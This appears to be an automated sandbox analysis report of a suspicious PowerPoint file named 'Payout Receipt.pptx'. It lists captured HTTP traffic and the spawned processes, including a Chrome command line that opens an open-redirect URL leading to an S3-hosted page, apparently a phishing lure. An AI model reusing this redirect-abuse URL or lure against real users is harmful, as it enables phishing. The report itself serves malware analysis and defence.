                                                                                                                              Set-Cookie: _EDGE_S=SID=2BC2EBE75260604F285CFEE953F06139&mkt=de-ch; domain=.bing.com; path=/; HttpOnly
                                                                                                                              Set-Cookie: ANON=A=84BEA1DAAAB85FA790252CDAFFFFFFFF; domain=.bing.com; expires=Wed, 29-Oct-2025 13:11:36 GMT; path=/; secure; SameSite=None
                                                                                                                              Set-Cookie: WLS=C=0000000000000000&N=; domain=.bing.com; path=/; secure; SameSite=None
                                                                                                                              Set-Cookie: _SS=SID=2BC2EBE75260604F285CFEE953F06139; domain=.bing.com; path=/; secure; SameSite=None
                                                                                                                              Alt-Svc: h3=":443"; ma=93600
                                                                                                                              X-CDN-TraceID: 0.0cd01702.1728047496.cd7f8bb
                                                                                                                              2024-10-04 13:11:37 UTC2215INData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 31 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 46 65 61 74 75 72 65 43 6f 6e 66 69 67 22 3a 7b 22 53 65 61 72 63 68 42 6f 78 49 62 65 61 6d 50 6f 69 6e 74 65 72 4f 6e 48 6f 76 65 72 22 3a 7b 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 68 6f 77 53 65 61 72 63 68 47 6c 79 70 68 4c 65 66 74 4f 66 53 65 61 72 63 68 42 6f 78 22 3a 7b 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 65 61 72 63 68 42 6f 78 55 73 65 53 65 61 72 63 68 49 63 6f 6e 41 74 52 65 73 74 22 3a 7b 22 76 61 6c 75 65 22 3a 66 61 6c 73 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 65 61 72 63 68 42 75 74 74 6f 6e 55 73 65 53 65 61 72 63 68 49 63 6f 6e 22 3a 7b 22 76 61 6c 75 65
                                                                                                                              Data Ascii: {"version":1,"config":{"FeatureConfig":{"SearchBoxIbeamPointerOnHover":{"value":true,"feature":""},"ShowSearchGlyphLeftOfSearchBox":{"value":true,"feature":""},"SearchBoxUseSearchIconAtRest":{"value":false,"feature":""},"SearchButtonUseSearchIcon":{"value


                                                                                                                              Click to jump to process

                                                                                                                              Click to jump to process

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Click to jump to process

                                                                                                                              Target ID:3
                                                                                                                              Start time:09:10:35
                                                                                                                              Start date:04/10/2024
                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\Payout Receipt.pptx" /ou ""
                                                                                                                              Imagebase:0xda0000
                                                                                                                              File size:1'875'576 bytes
                                                                                                                              MD5 hash:2A43FE7F9F699F7F53FEBC254F68F46D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:false

                                                                                                                              Target ID:9
                                                                                                                              Start time:09:10:36
                                                                                                                              Start date:04/10/2024
                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "4F1F87A3-2D62-4CDB-ABDF-61BB45105DB2" "40BB7578-B581-41D4-B322-FEC0ED1808AE" "6380" "C:\Program Files (x86)\Microsoft Office\Root\Office16\POWERPNT.EXE" "PowerPointCombinedFloatieLreOnline.onnx"
                                                                                                                              Imagebase:0x7ff6712d0000
                                                                                                                              File size:710'048 bytes
                                                                                                                              MD5 hash:EC652BEDD90E089D9406AFED89A8A8BD
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              Target ID:11
                                                                                                                              Start time:09:10:43
                                                                                                                              Start date:04/10/2024
                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://nomicscare.com/fr/gdpr/cookie-consent/all/?next_url=//crewbloom.s3.amazonaws.com/34873.html
                                                                                                                              Imagebase:0x7ff7d6f10000
                                                                                                                              File size:3'242'272 bytes
                                                                                                                              MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              Target ID:12
                                                                                                                              Start time:09:10:44
                                                                                                                              Start date:04/10/2024
                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1944,i,8800721303449338163,5848358366860922411,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                              Imagebase:0x7ff7d6f10000
                                                                                                                              File size:3'242'272 bytes
                                                                                                                              MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              No disassembly